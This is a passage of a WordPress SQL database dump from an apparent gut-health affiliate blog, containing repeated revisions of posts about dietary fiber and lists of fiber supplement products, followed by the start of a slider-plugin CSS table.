The Twisted Shot, Apple Cider Vinegar Shots with Turmeric, Ginger, Cinnamon, Honey & Cayenne, 100% USDA Certified Organic, Gut Health

\n\n\n\n\"\"\n\n\n\n

TEAONIC My Gut Mojo: Digest, Detox Drinks For Better Digestion, With Cranberry, Ginger, Cinnamon

\n\n\n\n\"\"\n\n\n\n

Life Equals Organic Fiber, Probiotic, Prebiotic Digestion Superfood Shot Drink- 1/2 Day Organic Fruits and Veggies, Vegan

\n\n\n\n\"\"\n\n\n\n

Vive Organic Immunity Boost Shots

\n\n\n\n\"\"\n\n\n\n

+GNGR Immunity Booster Organic Ginger Shots with Turmeric - Premium Ginger Shots for All Natural Immune Support - Cold Pressed Ginger Juice with Turmeric and Cayenne Pepper

\n\n\n\n\"\"\n','The Pros and Cons of Gut Health Shots','','inherit','closed','closed','','5574-revision-v1','','','2023-10-12 15:59:03','2023-10-12 15:59:03','',5574,'https://tummyrevolution.com/?p=5775',0,'revision','',0),(5776,1,'2023-10-12 16:37:32','2023-10-12 16:37:32','\n

When it comes to achieving optimal health, we often hear about the importance of a balanced diet and regular exercise. However, there\'s a silent hero working behind the scenes in your body, playing a vital role in your well-being: dietary fiber. Yes, that\'s right – fiber is the unsung champion of gut health!

\n\n\n\n

The Gut\'s Best Friend

\n\n\n\n

Fiber is like the loyal friend your gut can always count on. It\'s a type of carbohydrate found in plant-based foods, such as fruits, vegetables, whole grains, legumes, and nuts. What makes fiber truly remarkable is its ability to transform your gut health for the better.

\n\n\n\n

A Digestive Dynamo

\n\n\n\n

Your digestive system is like a finely tuned engine, and fiber is the premium fuel that keeps it running smoothly. Here\'s how:

\n\n\n\n

1. Improved Digestion

\n\n\n\n

Fiber adds bulk to your stool, making it easier to pass through your intestines. This helps prevent constipation and promotes regular bowel movements, which are essential for a healthy gut.

\n\n\n\n

2. Nourishing Good Bacteria

\n\n\n\n

Fiber is the preferred food source for the beneficial bacteria living in your gut, known as probiotics. These good bacteria play a crucial role in maintaining a balanced gut microbiome, which is linked to better digestion and a stronger immune system.

\n\n\n\n

3. Reduced Inflammation

\n\n\n\n

A high-fiber diet can help reduce inflammation in your gut. Chronic inflammation can lead to various health issues, including digestive disorders like irritable bowel syndrome (IBS) and even serious conditions like inflammatory bowel disease (IBD).

\n\n\n\n

Fiber-Rich Foods to the Rescue

\n\n\n\n

To reap the benefits of fiber, include more of these fiber-rich foods in your diet:

\n\n\n\n
    \n
  • Whole Grains: Opt for whole wheat bread, brown rice, quinoa, and oats.
  • \n\n\n\n
  • Fruits: Enjoy apples, berries, pears, and oranges with their skins on.
  • \n\n\n\n
  • Vegetables: Load up on broccoli, kale, spinach, carrots, and sweet potatoes.
  • \n\n\n\n
  • Legumes: Incorporate beans, lentils, and chickpeas into your meals.
  • \n\n\n\n
  • Nuts and Seeds: Snack on almonds, chia seeds, and flaxseeds.
  • \n
\n\n\n\n

A Happy Gut, A Happy You

\n\n\n\n

Incorporating fiber into your daily diet can lead to a happier, healthier gut. A well-nourished gut translates to improved digestion, enhanced immunity, and even a better mood. So, make fiber your gut\'s superhero, and you\'ll be well on your way to a healthier, happier you. Don\'t underestimate the power of this simple dietary change – it\'s small steps like these that can make a world of difference in your overall well-being.

\n\n\n\n

Metamucil, Daily Psyllium Husk Powder Supplement, 3-in-1 Fiber for Digestive Health, Plant Based Fiber

\n\n\n\n\"\"\n','Title: \"Fiber: Your Gut\'s Superhero for a Healthy You!\"','','inherit','closed','closed','','5543-revision-v1','','','2023-10-12 16:37:32','2023-10-12 16:37:32','',5543,'https://tummyrevolution.com/?p=5776',0,'revision','',0),(5777,1,'2023-10-12 16:40:41','2023-10-12 16:40:41','\n

When it comes to achieving optimal health, we often hear about the importance of a balanced diet and regular exercise. However, there\'s a silent hero working behind the scenes in your body, playing a vital role in your well-being: dietary fiber. Yes, that\'s right – fiber is the unsung champion of gut health!

\n\n\n\n

The Gut\'s Best Friend

\n\n\n\n

Fiber is like the loyal friend your gut can always count on. It\'s a type of carbohydrate found in plant-based foods, such as fruits, vegetables, whole grains, legumes, and nuts. What makes fiber truly remarkable is its ability to transform your gut health for the better.

\n\n\n\n

A Digestive Dynamo

\n\n\n\n

Your digestive system is like a finely tuned engine, and fiber is the premium fuel that keeps it running smoothly. Here\'s how:

\n\n\n\n

1. Improved Digestion

\n\n\n\n

Fiber adds bulk to your stool, making it easier to pass through your intestines. This helps prevent constipation and promotes regular bowel movements, which are essential for a healthy gut.

\n\n\n\n

2. Nourishing Good Bacteria

\n\n\n\n

Fiber is the preferred food source for the beneficial bacteria living in your gut, known as probiotics. These good bacteria play a crucial role in maintaining a balanced gut microbiome, which is linked to better digestion and a stronger immune system.

\n\n\n\n

3. Reduced Inflammation

\n\n\n\n

A high-fiber diet can help reduce inflammation in your gut. Chronic inflammation can lead to various health issues, including digestive disorders like irritable bowel syndrome (IBS) and even serious conditions like inflammatory bowel disease (IBD).

\n\n\n\n

Fiber-Rich Foods to the Rescue

\n\n\n\n

To reap the benefits of fiber, include more of these fiber-rich foods in your diet:

\n\n\n\n
    \n
  • Whole Grains: Opt for whole wheat bread, brown rice, quinoa, and oats.
  • \n\n\n\n
  • Fruits: Enjoy apples, berries, pears, and oranges with their skins on.
  • \n\n\n\n
  • Vegetables: Load up on broccoli, kale, spinach, carrots, and sweet potatoes.
  • \n\n\n\n
  • Legumes: Incorporate beans, lentils, and chickpeas into your meals.
  • \n\n\n\n
  • Nuts and Seeds: Snack on almonds, chia seeds, and flaxseeds.
  • \n
\n\n\n\n

A Happy Gut, A Happy You

\n\n\n\n

Incorporating fiber into your daily diet can lead to a happier, healthier gut. A well-nourished gut translates to improved digestion, enhanced immunity, and even a better mood. So, make fiber your gut\'s superhero, and you\'ll be well on your way to a healthier, happier you. Don\'t underestimate the power of this simple dietary change – it\'s small steps like these that can make a world of difference in your overall well-being.

\n\n\n\n

Metamucil, Daily Psyllium Husk Powder Supplement, 3-in-1 Fiber for Digestive Health, Plant Based Fiber

\n\n\n\n\"\"\n\n\n\n

NOW Supplements, Psyllium Husk Caps 500 mg, Non-GMO Project Verified, Natural Soluble Fiber, Intestinal Health

\n\n\n\n\"\"\n','Title: \"Fiber: Your Gut\'s Superhero for a Healthy You!\"','','inherit','closed','closed','','5543-revision-v1','','','2023-10-12 16:40:41','2023-10-12 16:40:41','',5543,'https://tummyrevolution.com/?p=5777',0,'revision','',0),(5778,1,'2023-10-12 16:43:47','2023-10-12 16:43:47','\n

When it comes to achieving optimal health, we often hear about the importance of a balanced diet and regular exercise. However, there\'s a silent hero working behind the scenes in your body, playing a vital role in your well-being: dietary fiber. Yes, that\'s right – fiber is the unsung champion of gut health!

\n\n\n\n

The Gut\'s Best Friend

\n\n\n\n

Fiber is like the loyal friend your gut can always count on. It\'s a type of carbohydrate found in plant-based foods, such as fruits, vegetables, whole grains, legumes, and nuts. What makes fiber truly remarkable is its ability to transform your gut health for the better.

\n\n\n\n

A Digestive Dynamo

\n\n\n\n

Your digestive system is like a finely tuned engine, and fiber is the premium fuel that keeps it running smoothly. Here\'s how:

\n\n\n\n

1. Improved Digestion

\n\n\n\n

Fiber adds bulk to your stool, making it easier to pass through your intestines. This helps prevent constipation and promotes regular bowel movements, which are essential for a healthy gut.

\n\n\n\n

2. Nourishing Good Bacteria

\n\n\n\n

Fiber is the preferred food source for the beneficial bacteria living in your gut, known as probiotics. These good bacteria play a crucial role in maintaining a balanced gut microbiome, which is linked to better digestion and a stronger immune system.

\n\n\n\n

3. Reduced Inflammation

\n\n\n\n

A high-fiber diet can help reduce inflammation in your gut. Chronic inflammation can lead to various health issues, including digestive disorders like irritable bowel syndrome (IBS) and even serious conditions like inflammatory bowel disease (IBD).

\n\n\n\n

Fiber-Rich Foods to the Rescue

\n\n\n\n

To reap the benefits of fiber, include more of these fiber-rich foods in your diet:

\n\n\n\n
    \n
  • Whole Grains: Opt for whole wheat bread, brown rice, quinoa, and oats.
  • \n\n\n\n
  • Fruits: Enjoy apples, berries, pears, and oranges with their skins on.
  • \n\n\n\n
  • Vegetables: Load up on broccoli, kale, spinach, carrots, and sweet potatoes.
  • \n\n\n\n
  • Legumes: Incorporate beans, lentils, and chickpeas into your meals.
  • \n\n\n\n
  • Nuts and Seeds: Snack on almonds, chia seeds, and flaxseeds.
  • \n
\n\n\n\n

A Happy Gut, A Happy You

\n\n\n\n

Incorporating fiber into your daily diet can lead to a happier, healthier gut. A well-nourished gut translates to improved digestion, enhanced immunity, and even a better mood. So, make fiber your gut\'s superhero, and you\'ll be well on your way to a healthier, happier you. Don\'t underestimate the power of this simple dietary change – it\'s small steps like these that can make a world of difference in your overall well-being.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Metamucil, Daily Psyllium Husk Powder Supplement, 3-in-1 Fiber for Digestive Health, Plant Based Fiber

\n\n\n\n\"\"\n\n\n\n

NOW Supplements, Psyllium Husk Caps 500 mg, Non-GMO Project Verified, Natural Soluble Fiber, Intestinal Health

\n\n\n\n\"\"\n\n\n\n

Garden of Life Fiber Supplement, Raw Organic Fiber Powder

\n\n\n\n\"\"\n','Title: \"Fiber: Your Gut\'s Superhero for a Healthy You!\"','','inherit','closed','closed','','5543-revision-v1','','','2023-10-12 16:43:47','2023-10-12 16:43:47','',5543,'https://tummyrevolution.com/?p=5778',0,'revision','',0),(5779,1,'2023-10-12 16:55:55','2023-10-12 16:55:55','\n

When it comes to achieving optimal health, we often hear about the importance of a balanced diet and regular exercise. However, there\'s a silent hero working behind the scenes in your body, playing a vital role in your well-being: dietary fiber. Yes, that\'s right – fiber is the unsung champion of gut health!

\n\n\n\n

The Gut\'s Best Friend

\n\n\n\n

Fiber is like the loyal friend your gut can always count on. It\'s a type of carbohydrate found in plant-based foods, such as fruits, vegetables, whole grains, legumes, and nuts. What makes fiber truly remarkable is its ability to transform your gut health for the better.

\n\n\n\n

A Digestive Dynamo

\n\n\n\n

Your digestive system is like a finely tuned engine, and fiber is the premium fuel that keeps it running smoothly. Here\'s how:

\n\n\n\n

1. Improved Digestion

\n\n\n\n

Fiber adds bulk to your stool, making it easier to pass through your intestines. This helps prevent constipation and promotes regular bowel movements, which are essential for a healthy gut.

\n\n\n\n

2. Nourishing Good Bacteria

\n\n\n\n

Fiber is the preferred food source for the beneficial bacteria living in your gut, known as probiotics. These good bacteria play a crucial role in maintaining a balanced gut microbiome, which is linked to better digestion and a stronger immune system.

\n\n\n\n

3. Reduced Inflammation

\n\n\n\n

A high-fiber diet can help reduce inflammation in your gut. Chronic inflammation can lead to various health issues, including digestive disorders like irritable bowel syndrome (IBS) and even serious conditions like inflammatory bowel disease (IBD).

\n\n\n\n

Fiber-Rich Foods to the Rescue

\n\n\n\n

To reap the benefits of fiber, include more of these fiber-rich foods in your diet:

\n\n\n\n
    \n
  • Whole Grains: Opt for whole wheat bread, brown rice, quinoa, and oats.
  • \n\n\n\n
  • Fruits: Enjoy apples, berries, pears, and oranges with their skins on.
  • \n\n\n\n
  • Vegetables: Load up on broccoli, kale, spinach, carrots, and sweet potatoes.
  • \n\n\n\n
  • Legumes: Incorporate beans, lentils, and chickpeas into your meals.
  • \n\n\n\n
  • Nuts and Seeds: Snack on almonds, chia seeds, and flaxseeds.
  • \n
\n\n\n\n

A Happy Gut, A Happy You

\n\n\n\n

Incorporating fiber into your daily diet can lead to a happier, healthier gut. A well-nourished gut translates to improved digestion, enhanced immunity, and even a better mood. So, make fiber your gut\'s superhero, and you\'ll be well on your way to a healthier, happier you. Don\'t underestimate the power of this simple dietary change – it\'s small steps like these that can make a world of difference in your overall well-being.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Metamucil, Daily Psyllium Husk Powder Supplement, 3-in-1 Fiber for Digestive Health, Plant Based Fiber

\n\n\n\n\"\"\n\n\n\n

NOW Supplements, Psyllium Husk Caps 500 mg, Non-GMO Project Verified, Natural Soluble Fiber, Intestinal Health

\n\n\n\n\"\"\n\n\n\n

Garden of Life Fiber Supplement, Raw Organic Fiber Powder

\n\n\n\n\"\"\n\n\n\n

Viva Naturals Organic Psyllium Husk Powder (1.5 lbs) - Easy Mixing Fiber Supplement, Finely Ground & Non-GMO Powder for Promoting Regularity

\n\n\n\n\"\"\n','Title: \"Fiber: Your Gut\'s Superhero for a Healthy You!\"','','inherit','closed','closed','','5543-revision-v1','','','2023-10-12 16:55:55','2023-10-12 16:55:55','',5543,'https://tummyrevolution.com/?p=5779',0,'revision','',0),(5780,1,'2023-10-12 17:06:10','2023-10-12 17:06:10','\n

When it comes to achieving optimal health, we often hear about the importance of a balanced diet and regular exercise. However, there\'s a silent hero working behind the scenes in your body, playing a vital role in your well-being: dietary fiber. Yes, that\'s right – fiber is the unsung champion of gut health!

\n\n\n\n

The Gut\'s Best Friend

\n\n\n\n

Fiber is like the loyal friend your gut can always count on. It\'s a type of carbohydrate found in plant-based foods, such as fruits, vegetables, whole grains, legumes, and nuts. What makes fiber truly remarkable is its ability to transform your gut health for the better.

\n\n\n\n

A Digestive Dynamo

\n\n\n\n

Your digestive system is like a finely tuned engine, and fiber is the premium fuel that keeps it running smoothly. Here\'s how:

\n\n\n\n

1. Improved Digestion

\n\n\n\n

Fiber adds bulk to your stool, making it easier to pass through your intestines. This helps prevent constipation and promotes regular bowel movements, which are essential for a healthy gut.

\n\n\n\n

2. Nourishing Good Bacteria

\n\n\n\n

Fiber is the preferred food source for the beneficial bacteria living in your gut, known as probiotics. These good bacteria play a crucial role in maintaining a balanced gut microbiome, which is linked to better digestion and a stronger immune system.

\n\n\n\n

3. Reduced Inflammation

\n\n\n\n

A high-fiber diet can help reduce inflammation in your gut. Chronic inflammation can lead to various health issues, including digestive disorders like irritable bowel syndrome (IBS) and even serious conditions like inflammatory bowel disease (IBD).

\n\n\n\n

Fiber-Rich Foods to the Rescue

\n\n\n\n

To reap the benefits of fiber, include more of these fiber-rich foods in your diet:

\n\n\n\n
    \n
  • Whole Grains: Opt for whole wheat bread, brown rice, quinoa, and oats.
  • \n\n\n\n
  • Fruits: Enjoy apples, berries, pears, and oranges with their skins on.
  • \n\n\n\n
  • Vegetables: Load up on broccoli, kale, spinach, carrots, and sweet potatoes.
  • \n\n\n\n
  • Legumes: Incorporate beans, lentils, and chickpeas into your meals.
  • \n\n\n\n
  • Nuts and Seeds: Snack on almonds, chia seeds, and flaxseeds.
  • \n
\n\n\n\n

A Happy Gut, A Happy You

\n\n\n\n

Incorporating fiber into your daily diet can lead to a happier, healthier gut. A well-nourished gut translates to improved digestion, enhanced immunity, and even a better mood. So, make fiber your gut\'s superhero, and you\'ll be well on your way to a healthier, happier you. Don\'t underestimate the power of this simple dietary change – it\'s small steps like these that can make a world of difference in your overall well-being.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Metamucil, Daily Psyllium Husk Powder Supplement, 3-in-1 Fiber for Digestive Health, Plant Based Fiber

\n\n\n\n\"\"\n\n\n\n

NOW Supplements, Psyllium Husk Caps 500 mg, Non-GMO Project Verified, Natural Soluble Fiber, Intestinal Health

\n\n\n\n\"\"\n\n\n\n

Garden of Life Fiber Supplement, Raw Organic Fiber Powder

\n\n\n\n\"\"\n\n\n\n

Viva Naturals Organic Psyllium Husk Powder (1.5 lbs) - Easy Mixing Fiber Supplement, Finely Ground & Non-GMO Powder for Promoting Regularity

\n\n\n\n\"\"\n\n\n\n

Natural Factors, Organic Low FODMAP Reliefiber, Digestive Fiber Powder

\n\n\n\n\"\"\n','Title: \"Fiber: Your Gut\'s Superhero for a Healthy You!\"','','inherit','closed','closed','','5543-revision-v1','','','2023-10-12 17:06:10','2023-10-12 17:06:10','',5543,'https://tummyrevolution.com/?p=5780',0,'revision','',0),(5781,1,'2023-10-12 17:12:16','2023-10-12 17:12:16','\n

When it comes to achieving optimal health, we often hear about the importance of a balanced diet and regular exercise. However, there\'s a silent hero working behind the scenes in your body, playing a vital role in your well-being: dietary fiber. Yes, that\'s right – fiber is the unsung champion of gut health! (Skip to top 5 Fibre Supplements HERE)

\n\n\n\n

The Gut\'s Best Friend

\n\n\n\n

Fiber is like the loyal friend your gut can always count on. It\'s a type of carbohydrate found in plant-based foods, such as fruits, vegetables, whole grains, legumes, and nuts. What makes fiber truly remarkable is its ability to transform your gut health for the better.

\n\n\n\n

A Digestive Dynamo

\n\n\n\n

Your digestive system is like a finely tuned engine, and fiber is the premium fuel that keeps it running smoothly. Here\'s how:

\n\n\n\n

1. Improved Digestion

\n\n\n\n

Fiber adds bulk to your stool, making it easier to pass through your intestines. This helps prevent constipation and promotes regular bowel movements, which are essential for a healthy gut.

\n\n\n\n

2. Nourishing Good Bacteria

\n\n\n\n

Fiber is the preferred food source for the beneficial bacteria living in your gut, known as probiotics. These good bacteria play a crucial role in maintaining a balanced gut microbiome, which is linked to better digestion and a stronger immune system.

\n\n\n\n

3. Reduced Inflammation

\n\n\n\n

A high-fiber diet can help reduce inflammation in your gut. Chronic inflammation can lead to various health issues, including digestive disorders like irritable bowel syndrome (IBS) and even serious conditions like inflammatory bowel disease (IBD).

\n\n\n\n

Fiber-Rich Foods to the Rescue

\n\n\n\n

To reap the benefits of fiber, include more of these fiber-rich foods in your diet:

\n\n\n\n
    \n
  • Whole Grains: Opt for whole wheat bread, brown rice, quinoa, and oats.
  • \n\n\n\n
  • Fruits: Enjoy apples, berries, pears, and oranges with their skins on.
  • \n\n\n\n
  • Vegetables: Load up on broccoli, kale, spinach, carrots, and sweet potatoes.
  • \n\n\n\n
  • Legumes: Incorporate beans, lentils, and chickpeas into your meals.
  • \n\n\n\n
  • Nuts and Seeds: Snack on almonds, chia seeds, and flaxseeds.
  • \n
\n\n\n\n

A Happy Gut, A Happy You

\n\n\n\n

Incorporating fiber into your daily diet can lead to a happier, healthier gut. A well-nourished gut translates to improved digestion, enhanced immunity, and even a better mood. So, make fiber your gut\'s superhero, and you\'ll be well on your way to a healthier, happier you. Don\'t underestimate the power of this simple dietary change – it\'s small steps like these that can make a world of difference in your overall well-being.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Top 5 Fibre Supplements to Promote Good Gut Health

\n\n\n\n

Metamucil, Daily Psyllium Husk Powder Supplement, 3-in-1 Fiber for Digestive Health, Plant Based Fiber

\n\n\n\n\"\"\n\n\n\n

NOW Supplements, Psyllium Husk Caps 500 mg, Non-GMO Project Verified, Natural Soluble Fiber, Intestinal Health

\n\n\n\n\"\"\n\n\n\n

Garden of Life Fiber Supplement, Raw Organic Fiber Powder

\n\n\n\n\"\"\n\n\n\n

Viva Naturals Organic Psyllium Husk Powder (1.5 lbs) - Easy Mixing Fiber Supplement, Finely Ground & Non-GMO Powder for Promoting Regularity

\n\n\n\n\"\"\n\n\n\n

Natural Factors, Organic Low FODMAP Reliefiber, Digestive Fiber Powder

\n\n\n\n\"\"\n','Title: \"Fiber: Your Gut\'s Superhero for a Healthy You!\"','','inherit','closed','closed','','5543-revision-v1','','','2023-10-12 17:12:16','2023-10-12 17:12:16','',5543,'https://tummyrevolution.com/?p=5781',0,'revision','',0),(5782,1,'2023-10-12 17:32:33','0000-00-00 00:00:00','\n

Incorporating fiber into your daily diet can lead to a happier, healthier gut. A well-nourished gut translates to improved digestion, enhanced immunity, and even a better mood. So, make fiber your gut\'s superhero, and you\'ll be well on your way to a healthier, happier you. Don\'t underestimate the power of this simple dietary change – it\'s small steps like these that can make a world of difference in your overall well-being. Below you\'ll find a list of 5 fiber supplements you can help promote better gut health

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Metamucil, Daily Psyllium Husk Powder Supplement, 3-in-1 Fiber for Digestive Health, Plant Based Fiber

\n\n\n\n\"\"\n\n\n\n

NOW Supplements, Psyllium Husk Caps 500 mg, Non-GMO Project Verified, Natural Soluble Fiber, Intestinal Health

\n\n\n\n\"\"\n\n\n\n

Garden of Life Fiber Supplement, Raw Organic Fiber Powder

\n\n\n\n\"\"\n\n\n\n

Viva Naturals Organic Psyllium Husk Powder (1.5 lbs) - Easy Mixing Fiber Supplement, Finely Ground & Non-GMO Powder for Promoting Regularity

\n\n\n\n\"\"\n\n\n\n

Natural Factors, Organic Low FODMAP Reliefiber, Digestive Fiber Powder

\n\n\n\n\"\"\n','Top 5 Fiber Supplements to Promote Good Gut Health','','draft','open','open','','','','','2023-10-12 17:32:33','2023-10-12 17:32:33','',0,'https://tummyrevolution.com/?p=5782',0,'post','',0),(5783,1,'2023-10-12 17:28:47','2023-10-12 17:28:47','Top 5 fiber supplements and why to take fibee supplements','Fibre Supplements','Get top 5 fibre supplements here','inherit','open','closed','','ryan-pouncy-z7vl_gk6cji-unsplash','','','2023-10-12 17:31:04','2023-10-12 17:31:04','',5782,'http://tummyrevolution.com/wp-content/uploads/2023/10/ryan-pouncy-z7vL_Gk6CJI-unsplash.jpg',0,'attachment','image/jpeg',0),(5784,1,'2023-10-12 17:31:43','2023-10-12 17:31:43','\n

Incorporating fiber into your daily diet can lead to a happier, healthier gut. A well-nourished gut translates to improved digestion, enhanced immunity, and even a better mood. So, make fiber your gut\'s superhero, and you\'ll be well on your way to a healthier, happier you. Don\'t underestimate the power of this simple dietary change – it\'s small steps like these that can make a world of difference in your overall well-being. Below you\'ll find a list of 5 fiber supplements you can help promote better gut health

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Metamucil, Daily Psyllium Husk Powder Supplement, 3-in-1 Fiber for Digestive Health, Plant Based Fiber

\n\n\n\n\"\"\n\n\n\n

NOW Supplements, Psyllium Husk Caps 500 mg, Non-GMO Project Verified, Natural Soluble Fiber, Intestinal Health

\n\n\n\n\"\"\n\n\n\n

Garden of Life Fiber Supplement, Raw Organic Fiber Powder

\n\n\n\n\"\"\n\n\n\n

Viva Naturals Organic Psyllium Husk Powder (1.5 lbs) - Easy Mixing Fiber Supplement, Finely Ground & Non-GMO Powder for Promoting Regularity

\n\n\n\n\"\"\n\n\n\n

Natural Factors, Organic Low FODMAP Reliefiber, Digestive Fiber Powder

\n\n\n\n\"\"\n','Top 5 Fiber Supplements to Promote Good Gut Health','','inherit','closed','closed','','5782-revision-v1','','','2023-10-12 17:31:43','2023-10-12 17:31:43','',5782,'https://tummyrevolution.com/?p=5784',0,'revision','',0),(5786,1,'2023-10-12 17:53:23','0000-00-00 00:00:00','\n

Gut fiber supplements offer a range of benefits for digestive health. Here are three main advantages of incorporating gut fiber supplements into your routine:

\n\n\n\n
    \n
  1. Improved Digestive Regularity:\n
      \n
    • Benefit: Gut fiber supplements, especially those containing insoluble fiber, add bulk to the stool, promoting regular bowel movements.
    • \n\n\n\n
    • How it Works: Insoluble fiber is not easily broken down during digestion and adds bulk to the stool. This can help prevent constipation by speeding up the movement of food and waste through the digestive system.
    • \n
    \n
  2. \n\n\n\n
  3. Support for Gut Microbiota:\n
      \n
    • Benefit: Fiber serves as a prebiotic, nourishing the beneficial bacteria in the gut.
    • \n\n\n\n
    • How it Works: Certain types of fiber are fermented by gut bacteria, producing short-chain fatty acids (SCFAs) that provide energy for the cells lining the colon. This fermentation process supports the growth of beneficial bacteria, contributing to a balanced and healthy gut microbiome.
    • \n
    \n
  4. \n\n\n\n
  5. Blood Sugar Regulation:\n
      \n
    • Benefit: Soluble fiber in gut supplements can help regulate blood sugar levels.
    • \n\n\n\n
    • How it Works: Soluble fiber forms a gel-like substance when mixed with water, which can slow down the absorption of sugar in the digestive tract. This can help stabilize blood sugar levels, making fiber supplements beneficial for individuals with diabetes or those aiming to manage their blood sugar levels.
    • \n
    \n
  6. \n
\n\n\n\n

It\'s important to note that the specific benefits can vary based on the type and source of fiber used in the supplement. Additionally, individuals should always consult with a healthcare professional before incorporating new supplements into their routine, especially if they have existing medical conditions or are taking other medications. Furthermore, obtaining fiber through a varied and balanced diet that includes fruits, vegetables, whole grains, and legumes is generally recommended for overall health.

\n\n\n\n

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Top 5 Fibre Supplements to Promote Good Gut Health

\n\n\n\n

Metamucil, Daily Psyllium Husk Powder Supplement, 3-in-1 Fiber for Digestive Health, Plant Based Fiber

\n\n\n\n\"\"\n\n\n\n

NOW Supplements, Psyllium Husk Caps 500 mg, Non-GMO Project Verified, Natural Soluble Fiber, Intestinal Health

\n\n\n\n\"\"\n\n\n\n

Garden of Life Fiber Supplement, Raw Organic Fiber Powder

\n\n\n\n\"\"\n\n\n\n

Viva Naturals Organic Psyllium Husk Powder (1.5 lbs) - Easy Mixing Fiber Supplement, Finely Ground & Non-GMO Powder for Promoting Regularity

\n\n\n\n\"\"\n\n\n\n

Natural Factors, Organic Low FODMAP Reliefiber, Digestive Fiber Powder

\n\n\n\n\"\"\n','3 Main Benefits of Fibre Supplements & Top 5 Fibre Supplements','','draft','open','open','','','','','2023-10-12 17:53:23','2023-10-12 17:53:23','',0,'https://tummyrevolution.com/?p=5786',0,'post','',0),(5787,1,'2023-10-12 17:53:22','2023-10-12 17:53:22','\n

Gut fiber supplements offer a range of benefits for digestive health. Here are three main advantages of incorporating gut fiber supplements into your routine:

\n\n\n\n
    \n
  1. Improved Digestive Regularity:\n
      \n
    • Benefit: Gut fiber supplements, especially those containing insoluble fiber, add bulk to the stool, promoting regular bowel movements.
    • \n\n\n\n
    • How it Works: Insoluble fiber is not easily broken down during digestion and adds bulk to the stool. This can help prevent constipation by speeding up the movement of food and waste through the digestive system.
    • \n
    \n
  2. \n\n\n\n
  3. Support for Gut Microbiota:\n
      \n
    • Benefit: Fiber serves as a prebiotic, nourishing the beneficial bacteria in the gut.
    • \n\n\n\n
    • How it Works: Certain types of fiber are fermented by gut bacteria, producing short-chain fatty acids (SCFAs) that provide energy for the cells lining the colon. This fermentation process supports the growth of beneficial bacteria, contributing to a balanced and healthy gut microbiome.
    • \n
    \n
  4. \n\n\n\n
  5. Blood Sugar Regulation:\n
      \n
    • Benefit: Soluble fiber in gut supplements can help regulate blood sugar levels.
    • \n\n\n\n
    • How it Works: Soluble fiber forms a gel-like substance when mixed with water, which can slow down the absorption of sugar in the digestive tract. This can help stabilize blood sugar levels, making fiber supplements beneficial for individuals with diabetes or those aiming to manage their blood sugar levels.
    • \n
    \n
  6. \n
\n\n\n\n

It\'s important to note that the specific benefits can vary based on the type and source of fiber used in the supplement. Additionally, individuals should always consult with a healthcare professional before incorporating new supplements into their routine, especially if they have existing medical conditions or are taking other medications. Furthermore, obtaining fiber through a varied and balanced diet that includes fruits, vegetables, whole grains, and legumes is generally recommended for overall health.

\n\n\n\n

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Top 5 Fibre Supplements to Promote Good Gut Health

\n\n\n\n

Metamucil, Daily Psyllium Husk Powder Supplement, 3-in-1 Fiber for Digestive Health, Plant Based Fiber

\n\n\n\n\"\"\n\n\n\n

NOW Supplements, Psyllium Husk Caps 500 mg, Non-GMO Project Verified, Natural Soluble Fiber, Intestinal Health

\n\n\n\n\"\"\n\n\n\n

Garden of Life Fiber Supplement, Raw Organic Fiber Powder

\n\n\n\n\"\"\n\n\n\n

Viva Naturals Organic Psyllium Husk Powder (1.5 lbs) - Easy Mixing Fiber Supplement, Finely Ground & Non-GMO Powder for Promoting Regularity

\n\n\n\n\"\"\n\n\n\n

Natural Factors, Organic Low FODMAP Reliefiber, Digestive Fiber Powder

\n\n\n\n\"\"\n','3 Main Benefits of Fibre Supplements & Top 5 Fibre Supplements','','inherit','closed','closed','','5786-revision-v1','','','2023-10-12 17:53:22','2023-10-12 17:53:22','',5786,'https://tummyrevolution.com/?p=5787',0,'revision','',0); /*!40000 ALTER TABLE `wpvt_posts` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_revslider_css` -- DROP TABLE IF EXISTS `wpvt_revslider_css`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_revslider_css` ( `id` int(9) NOT NULL AUTO_INCREMENT, `handle` text NOT NULL, `settings` longtext DEFAULT NULL, `hover` longtext DEFAULT NULL, `advanced` longtext DEFAULT NULL, `params` longtext NOT NULL, UNIQUE KEY `id` (`id`), KEY `handle_index` (`handle`(64)) ) ENGINE=MyISAM AUTO_INCREMENT=110 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_revslider_css` -- LOCK TABLES `wpvt_revslider_css` WRITE; /*!40000 ALTER TABLE `wpvt_revslider_css` DISABLE KEYS */; INSERT INTO `wpvt_revslider_css` (`id`, `handle`, `settings`, `hover`, `advanced`, `params`) VALUES (1,'.tp-caption.medium_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"padding\":\"2px 4px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#888\"}'),(2,'.tp-caption.small_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 